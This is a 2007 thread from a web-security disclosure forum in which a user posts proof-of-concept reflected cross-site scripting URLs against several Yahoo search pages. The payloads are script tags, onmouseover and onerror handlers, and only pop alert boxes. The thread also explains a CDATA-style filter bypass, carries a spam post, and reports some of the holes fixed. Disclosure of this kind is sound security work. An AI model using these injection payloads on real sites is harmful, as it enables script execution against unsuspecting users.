Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
How do you yahoo?
Posted by: tx
Date: July 18, 2007 07:24PM

I'm hoping with javascript turned off. >;)

so, lack of router had me out of the loop for a while, but I return with a hat trick:

http://search.personals.yahoo.com/us/results/results?searchinternal=1&kws=0&pagenum=50&resulttype=1&searchview=1&searchsort=1&affsource=-xss&adid=&speed=2&advanced=&primary=&searchname=&modified=&bes=&keywords=%22%3E%3Cscript%3Ealert%28%27Lookin%5C%27%20fer%20love%5Cnin%20all%20the%20wrong%20places...%27%29%3B%3C/script%3E%5D%5D%21%3E%3C%21%5B%20&searchsource=3 javascript only executes if the user has already made a successful search (Like this: http://search.personals.yahoo.com/us/results/results?resulttype=1&searchmode=1&searchsource=1&searchview=1&advanced=1&r_gender=2&r_gender_pref=1&r_min_age=20&r_max_age=40&r_has_photo=2&r_radius=80&r_loc_ver=2&r_education=999&r_body_type_w=0&r_ethnicity_w=0&&r_city=Hollywood&r_country=United%20State&r_latitude=341066&r_loc_ver=2&r_locid=24023342&r_longitude=-1182877&r_state=California&r_state_code=CA&r_zip=90078&) The 'keywords' variable seems to be used to refine a search, so some search results have to be there in the first place.


http://search.messages.yahoo.com/search?.mbintl=finance'onmouseover='alert(String.fromCharCode(88,83,83));'&q=stock&type=5h4fOyrVWscxUKTv.S3gUptyDexcF5k_N1aqaIA_os5zQmPn7n.OWvTit56AVIY8&action=Search&srch=1&v=Z2OkLT3VWsch65KZBXoCmNuHCfLlsu_jszH6iaEhtmQNMXxRv796x7MpVtKePA--&b=1&within=subject&within=msgtext&showthread=tm&sentiment=0&thisuser=&postedon=pd&sMonth=7&sDay=18&sYear=2007&eMonth=7&eDay=18&eYear=2007 <-- the onmouseover event fires from the Next link (and arrow) at the bottom of the page

http://travel.yahoo.com/trip-search-country-'%22%3E%3Cimg%20src=tx%20onerror=alert('xss')%3E%5D!%3E%3C!%5B

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/18/2007 07:29PM by tx.

Options: ReplyQuote
Re: How do you yahoo?
Posted by: John
Date: July 18, 2007 07:50PM

This topic had me going O_O from the begining, but lol, nice find.

That is quite a sexy POC you have there.

One question. How come when I remove ]!><![ I get the alert multiple times, but when I leave it I get it once?



Edited 2 time(s). Last edit at 07/18/2007 07:52PM by John.

Options: ReplyQuote
Re: How do you yahoo?
Posted by: tx
Date: July 18, 2007 08:06PM

All characters within <![ and ]!> will be ignored by the parser, and instead are interpreted as character data ( CDATA ) in xml http://en.wikipedia.org/wiki/CDATA . Afaik a CDATA block should be opened with <![CDATA[ and closed with ]]>, but for these purposes (to hide a bunch of markup from the parser) it works effectively.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: How do you yahoo?
Posted by: testi32
Date: July 23, 2007 05:21AM

Yahoo for me is the worst one: http://www.testi32.com/di/queen/index.php
Take a closer look at Yahoo! Mail. Get these great features: Powerful protection against spam and viruses, 1GB of email storage, PhotoMail, message size up as the saied : http://www.testi32.com/di/joe-jackson/index.php letras for cazoni italene

minoi 0 : http://www.testi32.com/di/donna-summer/index.php
donna - http://www.testi32.com/di/dru-hill/index.php

Options: ReplyQuote
Re: How do you yahoo?
Posted by: tx
Date: July 23, 2007 12:04PM

yes, I also hate how yahoo indexes songs by Queen and Joe Jackson. wtf? spammer...

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: How do you yahoo?
Posted by: tx
Date: July 25, 2007 11:39PM

FIXED: search.personals.yahoo.com & travel.yahoo.com (why were you allowing < and > in the title anyway?)

no love for search.messages.yahoo.com though, Yahoo?

-tx @ lowtech-labs.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.